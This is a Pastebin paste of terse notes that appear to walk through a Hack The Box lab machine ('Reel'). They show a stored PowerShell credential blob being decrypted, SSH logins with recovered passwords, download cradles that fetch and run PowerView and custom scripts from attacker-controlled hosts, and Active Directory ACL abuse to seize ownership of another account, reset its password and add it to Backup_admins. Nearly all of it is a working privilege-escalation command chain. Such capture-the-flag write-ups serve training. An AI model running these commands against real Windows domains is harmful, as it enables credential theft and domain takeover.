SHARE
TWEET

Untitled

a guest Aug 18th, 2018 1,272 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <S N="UserName">HTB\Tom</S>
  2.  <SS
  3. N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c4
  4. 2c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c0
  5. 41ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d47
  6. 69a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4
  7. dbfd763fea92b9d5444748692</SS>
  8. in the same path of user.txt
  9. for decrypt the key:
  10. PS C:\users\nico\desktop> $credxmlpath = "C:\Users\nico\desktop\cred.xml"
  11. PS C:\users\nico\desktop> $credential = Import-CliXml $credxmlpath
  12. PS C:\users\nico\desktop> $PlainPassword = $credential.GetNetworkCredential().Password
  13. PS C:\users\nico\desktop> $PlainPassword
  14. 1ts*********
  15. Tom | 1ts*********
  16. we can access trought ssh:
  17. ssh tom@10.10.10.77
  18. 1ts*********
  19. we need:
  20. https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1
  21. claire password is change each 60 sec
  22. so we need to build 2 files for fast interaction whit the box:
  23. IEX (New-Object Net.WebClient).downloadString("http://10.10.14.20/Downloads/ClairePW.ps1")
  24. where ClairePW.ps1 is
  25. IEX (New-Object Net.WebClient).downloadString("http://10.10.14.14/PowerView.ps1%22)
  26. Set-DomainObjectOwner -Identity 'CN=Claire Danes,CN=Users,DC=HTB,DC=LOCAL'
  27. -OwnerIdentity 'CN=Tom Hanson,CN=Users,DC=HTB,DC=LOCAL'
  28. Add-DomainObjectAcl -TargetIdentity 'CN=Claire Danes,CN=Users,DC=HTB,DC=LOCAL'
  29. -PrincipalIdentity 'CN=Tom Hanson,CN=Users,DC=HTB,DC=LOCAL'
  30. $pw = Convertto-securestring 'imt******' -asplaintext -force
  31. set-domainuserpassword -Identity 'CN=Claire Danes,CN=Users,DC=HTB,DC=LOCAL'
  32. -accountpassword $pw
  33. and after i ssh to claire whit password imt******
  34. ssh claire@10.10.10.77
  35. imt******
  36. after i do:
  37. IEX (New-Object
  38. Net.WebClient).downloadString("http://10.10.14.20/Downloads/ClaireGroup.ps1")
  39. were Claire Group.ps1 is:
  40. $id = [Security.Principal.WindowsIdentity]::GetCurrent()
  41. $user = Get-ADUser -Identity $id.User
  42. Add-ADGroupMember -Identity "Backup_admins" -Members $user
  43. after that we can check:
  44. claire@REEL C:\Users\Administrator\Desktop\Backup Scripts>type BackupScript.ps1
  45. # admin password
  46. $password="Cr4*************"
  47. now you can log ad administrator
  48. administrator@10.10.10.77
  49. Cr4*************
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top